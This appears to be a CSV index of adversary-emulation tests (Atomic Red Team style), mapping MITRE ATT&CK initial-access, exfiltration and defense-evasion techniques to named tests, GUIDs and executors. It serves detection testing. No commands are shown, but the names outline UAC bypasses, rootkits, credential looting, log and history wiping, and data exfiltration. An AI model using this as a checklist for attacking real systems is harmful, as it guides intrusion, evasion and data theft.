initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject 57ba4ce9-ee7a-4f27-9928-3c70c489b59d command_prompt
3 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
4 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 3 Rundll32 execute VBscript command using Ordinal number 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821 command_prompt
5 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 4 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
6 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 5 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
7 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 6 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
8 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 7 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
9 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 8 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
10 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 9 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
11 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 10 Execution of non-dll using rundll32.exe ae3a8605-b26e-457c-b6b3-2702fd335bac powershell
12 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 11 Rundll32 with Ordinal Value 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 command_prompt
13 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 12 Rundll32 with Control_RunDLL e4c04b6f-c492-4782-82c7-3bf75eb8077e command_prompt
14 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 13 Rundll32 with desk.cpl 83a95136-a496-423c-81d3-1c6750133917 command_prompt
15 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
16 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
17 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
18 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
19 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
20 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
21 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
22 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
23 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
24 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
25 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
26 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 10 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
27 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 11 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
28 defense-evasion T1216.001 Signed Script Proxy Execution: Pubprn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
29 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
30 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
31 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
32 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
33 defense-evasion T1014 Rootkit 4 Loadable Kernel Module based Rootkit (Diamorphine) 0b996469-48c6-46e2-8155-a17f8b6c2247 sh
34 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
35 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
36 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
37 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
38 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
39 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
40 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
41 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
42 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
43 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
44 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
45 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
46 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
47 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
48 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
49 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
50 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
51 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
52 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
53 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
54 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
55 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
56 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
57 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
58 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
59 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
60 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
61 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
62 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
63 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 2 Masquerade as a built-in system executable 35eb8d16-9820-4423-a2a1-90c4f5edd9ca powershell
64 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
65 defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
66 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
67 defense-evasion T1564 Hide Artifacts 4 Create and Hide a Service with sc.exe 333c7de0-6fbe-42aa-ac2b-c7e40b18246a command_prompt
68 defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
69 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
70 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
71 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
72 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
73 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
74 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 2 Delete log files using built-in log utility 653d39cd-bae7-499a-898c-9fb96b8b5cd1 sh
75 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 3 Truncate system log files via truncate utility 6290f8a8-8ee9-4661-b9cf-390031bf6973 sh
76 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 4 Delete log files via cat utility by appending /dev/null or /dev/zero c23bdb88-928d-493e-b46d-df2906a50941 sh
77 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 5 System log file deletion via find utility bc8eeb4a-cc3e-45ec-aa6e-41e973da2558 sh
78 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 6 Overwrite macOS system log via echo utility 0208ea60-98f1-4e8c-8052-930dce8f742c sh
79 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 7 Real-time system log clearance/deletion 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c sh
80 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 8 Delete system log files via unlink utility 03013b4b-01db-437d-909b-1fdaa5010ee8 sh
81 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 9 Delete system log files using shred utility 86f0e4d5-3ca7-45fb-829d-4eda32b232bb sh
82 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 10 Delete system log files using srm utility b0768a5e-0f32-4e75-ae5b-d036edcf96b6 sh
83 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 11 Delete system log files using OSAScript 810a465f-cd4f-47bc-b43e-d2de3b033ecc sh
84 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 12 Delete system log files using Applescript e62f8694-cbc7-468f-862c-b10cd07e1757 sh
85 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 13 Delete system journal logs via rm and journalctl utilities ca50dd85-81ff-48ca-92e1-61f119cb1dcf sh
86 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 14 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
87 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 15 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
88 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
89 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
90 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
91 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 4 InstallUtil Install method call 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b powershell
92 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 5 InstallUtil Uninstall method call - /U variant 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b powershell
93 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
94 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
95 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
96 defense-evasion T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
97 defense-evasion T1553.001 Subvert Trust Controls: Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
98 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
99 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
100 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
101 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
102 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
103 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 1 Msiexec.exe - Execute Local MSI file with embedded JScript a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 command_prompt
104 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 2 Msiexec.exe - Execute Local MSI file with embedded VBScript 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 command_prompt
105 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
106 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 4 Msiexec.exe - Execute Local MSI file with an embedded EXE ed3fa08a-ca18-4009-973e-03d13014d0e8 command_prompt
107 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 5 WMI Win32_Product Class - Execute Local MSI file with embedded JScript 882082f0-27c6-4eec-a43c-9aa80bccdb30 powershell
108 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 6 WMI Win32_Product Class - Execute Local MSI file with embedded VBScript cf470d9a-58e7-43e5-b0d2-805dffc05576 powershell
109 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 7 WMI Win32_Product Class - Execute Local MSI file with an embedded DLL 32eb3861-30da-4993-897a-42737152f5f8 powershell
110 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 8 WMI Win32_Product Class - Execute Local MSI file with an embedded EXE 55080eb0-49ae-4f55-a440-4167b7974f79 powershell
111 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 9 Msiexec.exe - Execute the DllRegisterServer function of a DLL 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d command_prompt
112 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 10 Msiexec.exe - Execute the DllUnregisterServer function of a DLL ab09ec85-4955-4f9c-b8e0-6851baf4d47f command_prompt
113 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 11 Msiexec.exe - Execute Remote MSI file 44a4bedf-ffe3-452e-bee4-6925ab125662 command_prompt
114 defense-evasion T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
115 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
116 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
117 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
118 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
119 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
120 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
121 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
122 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
123 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
124 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 10 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
125 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
126 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Set Custom AddToHistoryHandler to Avoid History File Logging 1d0d9aa6-6111-4f89-927b-53e8afae7f94 powershell
127 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
128 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
129 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
130 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
131 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
132 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
133 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
134 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
135 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
136 defense-evasion T1140 Deobfuscate/Decode Files or Information 7 Linux Base64 Encoded Shebang in CLI 3a15c372-67c1-4430-ac8e-ec06d641ce4d sh
137 defense-evasion T1140 Deobfuscate/Decode Files or Information 8 XOR decoding and command execution using Python c3b65cd5-ee51-4e98-b6a3-6cbdec138efc bash
138 defense-evasion T1562 Impair Defenses 1 Windows Disable LSA Protection 40075d5f-3a70-4c66-9125-f72bee87247d command_prompt
139 defense-evasion T1562 Impair Defenses 2 Disable journal logging via systemctl utility c3a377f9-1203-4454-aa35-9d391d34768f sh
140 defense-evasion T1562 Impair Defenses 3 Disable journal logging via sed utility 12e5551c-8d5c-408e-b3e4-63f53b03379f sh
141 defense-evasion T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
142 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd powershell
143 defense-evasion T1036 Masquerading 2 Malware Masquerading and Execution from Zip File 4449c89b-ec82-43a4-89c1-91e2f1abeecc powershell
144 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 1 Copy and Delete Mailbox Data on Windows d29f01ea-ac72-4efc-8a15-bea64b77fabf powershell
145 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 2 Copy and Delete Mailbox Data on Linux 25e2be0e-96f7-4417-bd16-a4a2500e3802 bash
146 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 3 Copy and Delete Mailbox Data on macOS 3824130e-a6e4-4528-8091-3a52eeb540f6 bash
147 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 4 Copy and Modify Mailbox Data on Windows edddff85-fee0-499d-9501-7d4d2892e79b powershell
148 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 5 Copy and Modify Mailbox Data on Linux 6d99f93c-da56-49e3-b195-163090ace4f6 bash
